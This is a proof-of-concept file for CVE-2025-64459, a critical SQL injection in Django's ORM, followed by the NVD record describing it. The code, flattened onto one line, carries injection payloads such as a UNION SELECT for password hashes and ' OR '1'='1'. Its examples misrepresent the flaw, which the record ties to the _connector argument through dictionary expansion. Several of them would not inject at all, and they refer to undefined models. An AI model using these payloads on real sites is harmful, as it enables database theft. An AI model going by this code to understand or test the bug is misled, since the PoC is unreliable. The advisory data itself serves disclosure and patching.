CVE-2025-64459

""" CVE-2025-64459 Django SQL Injection PoC Affected Versions: Django 5.1 < 5.1.14, 4.2 < 4.2.26, 5.2 < 5.2.8 """ from django.db import models from django.db.models import Q # Vulnerable code pattern - DO NOT use in production # Example 1: SQL Injection via filter() with dict expansion def vulnerable_filter_example(): # Attack payload via dictionary expansion malicious_dict = { 'id__in': [1, 2, 'UNION SELECT password FROM auth_user--'] } # Vulnerable: direct use of user-controlled dict as filter argument result = MyModel.objects.filter(**malicious_dict) # Example 2: SQL Injection via Q() object with custom connector def vulnerable_q_example(): # Attacker-controlled connector value user_input = "SQL_INJECTION_PAYLOAD" q_object = Q() q_object.connector = user_input # Vulnerable point q_object.children.append(('id', 1)) result = MyModel.objects.filter(q_object) # Example 3: Exclude method injection def vulnerable_exclude_example(): malicious_params = { 'name__contains': "' OR '1'='1" } result = MyModel.objects.exclude(**malicious_params) # Example 4: Simulated exploit via ORM query def exploit_orm_injection(): """ Simulated exploitation demonstrating SQL injection via QuerySet """ # Craft malicious Q object q = Q() q.connector = "OR" q.children = [] # Inject SQL via children q.children.append((None, "1=1")) # This would execute: SELECT * FROM table WHERE 1=1 result = Model.objects.filter(q) return result

{"cve": {"id": "CVE-2025-64459", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2025-11-05T15:15:41.080", "lastModified": "2025-11-10T18:25:59.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8.\nThe methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when using a suitably crafted dictionary, with dictionary expansion, as the `_connector` argument.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank cyberstan for reporting this issue."}, {"lang": "es", "value": "Se descubrió un problema en 5.1 anterior a 5.1.14, 4.2 anterior a 4.2.26 y 5.2 anterior a 5.2.8. Los métodos 'QuerySet.filter()', 'QuerySet.exclude()' y 'QuerySet.get()', y la clase 'Q()', están sujetos a inyección SQL cuando se utiliza un diccionario adecuadamente diseñado, con expansión de diccionario, como argumento '_connector'. Series anteriores de Django sin soporte (como 5.0.x, 4.1.x y 3.2.x) no fueron evaluadas y también pueden verse afectadas. Django desea agradecer a cyberstan por informar de este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.26", "matchCriteriaId": "5FC7EBE0-A60A-4083-9FB7-E4ADCD2B5F37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1", "versionEndExcluding": "5.1.14", "matchCriteriaId": "9F3A5471-02DB-428E-815E-516057A901FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.8", "matchCriteriaId": "F56E9016-F93A-4DAE-8070-D3A4909F00A4"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Mailing List"]}, {"url": "https://www.djangoproject.com/weblog/2025/nov/05/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}, {"url": "https://shivasurya.me/security/django/2025/11/07/django-sql-injection-CVE-2025-64459.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}